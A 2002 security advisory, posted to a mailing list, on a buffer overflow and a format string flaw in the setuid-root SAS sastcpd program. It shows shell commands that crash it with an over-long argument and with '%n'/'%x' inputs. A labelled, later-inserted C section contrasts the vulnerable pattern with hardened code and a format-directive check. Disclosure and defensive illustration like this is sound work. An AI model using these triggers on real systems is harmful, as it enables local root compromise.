sastcpd Buffer Overflow and Format String Vulnerabilities

From: Wodahs Latigid (wodahsat_private)
Date: Tue Jan 29 2002 - 01:59:41 PST


    ----------------------------------------------------------
    sastcpd Buffer Overflow and Format String Vulnerabilities 
    Ministry-of-Peace - www.ministryofpeace.co.uk             
    ----------------------------------------------------------
    
    SYNOPSIS
    
    "SAS software provides the foundation, tools, and
    solutions for data analysis, report generation,
    and enterprise-wide information delivery."
    
    The "SAS Job Spawner", sastcpd, contains both a buffer
    overflow and a format string vulnerability.
    
    SAS Support say that these problems were fixed in version
    8.2 of this product, but we are unable to confirm as we
    do not have access to this version.
    
    
    IMPACT
    
    sastcpd is installed setuid root by default, and therefore
    full root privileges can be obtained through exploitation
    of either of these vulnerabilities.
    
    
    DETAILS
    
    Version tested:
    SAS Job Spawner for Open Systems version 8.01
    
    $ sastcpd `perl -e "print 'A' x 1200"`
    Invalid argument: AAAA[..cut..]AAAA.
    Segmentation fault (core dumped)
    $ ls -la core
    -rw-------  1 root    teknix     1454382 Jan  28 04:22 core
    $ sastcpd %n
    Segmentation fault (core dumped)
    $ sastcpd %x
    Invalid argument: 2.
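    The transcript above shows the two defects the advisory reports: a
    1200-byte argument overruns a fixed buffer, and "%x" is interpreted
    (printing "2") because the argument reaches a printf-family call as
    its format string. The following C is an added illustration of that bug
    class and of how the argument-reporting path should be written; it is not
    sastcpd's code, and the function names, the 1024-byte argument limit and
    the sample inputs are assumptions made for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limit for a command-line argument in this example. */
#define ARG_LIMIT 1024

/*
 * Vulnerable pattern (assumed; one shape consistent with the advisory's
 * output, shown only for contrast and never compiled into a call here):
 *
 *     char buf[256];
 *     strcpy(buf, arg);                  // no length check: 1200 'A's overflow
 *     fputs("Invalid argument: ", stderr);
 *     fprintf(stderr, arg);              // user text used as the format string
 *
 * Because the binary is setuid root, both defects run with root privileges.
 */

/* Hardened form: the argument is only ever data, every copy is bounded, and
 * over-long input is rejected instead of silently truncated. Returns the
 * length of the message written to `out`, or -1 on rejection/truncation. */
int report_invalid_safe(const char *arg, char *out, size_t outlen)
{
    char buf[ARG_LIMIT];
    size_t len = strlen(arg);

    if (len >= sizeof buf)               /* would not fit: reject */
        return -1;
    memcpy(buf, arg, len + 1);

    /* "%s" makes the user text an argument, never a format directive */
    int n = snprintf(out, outlen, "Invalid argument: %s.", buf);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Detection check for logs or input filters: true if `arg` contains a
 * conversion directive that a printf-family call would interpret ("%%" is
 * the escaped literal and does not count). */
bool has_format_directive(const char *arg)
{
    const char *p = strchr(arg, '%');
    while (p) {
        if (p[1] == '%')                 /* literal percent, skip both */
            p = strchr(p + 2, '%');
        else if (p[1] == '\0')           /* trailing lone percent */
            return false;
        else
            return true;                 /* %x, %n, %s, ... */
    }
    return false;
}

/* Builds an argument of `len` 'A's (like the advisory's perl one-liner) and
 * returns what the hardened path does with it: message length, or -1. */
int probe_argument_length(size_t len)
{
    char out[ARG_LIMIT + 32];
    char *arg = malloc(len + 1);
    if (!arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int r = report_invalid_safe(arg, out, sizeof out);
    free(arg);
    return r;
}

int main(void)
{
    char out[64];
    /* constructed sample inputs mirroring the advisory's tests */
    printf("1200 x 'A' -> %d (rejected)\n", probe_argument_length(1200));
    printf("10 x 'A'   -> %d bytes\n", probe_argument_length(10));
    if (report_invalid_safe("%x", out, sizeof out) > 0)
        printf("%s\n", out);             /* prints the literal "%x" */
    printf("\"%%n\" has directive: %d\n", has_format_directive("%n"));
    return 0;
}
```

    The 1200-byte case that dumped core in the original now returns -1 before
    any copy is made, and "%x" or "%n" come back unchanged in the message
    because they are passed as data to a fixed "%s" format.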
    
    
    CREDITS
    
    Vulnerability discovered by Digital Shadow
    
    
    INFO
    
    Security Advisory #05
    Published: 29th January 2002
    
    
    



    This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 11:30:25 PST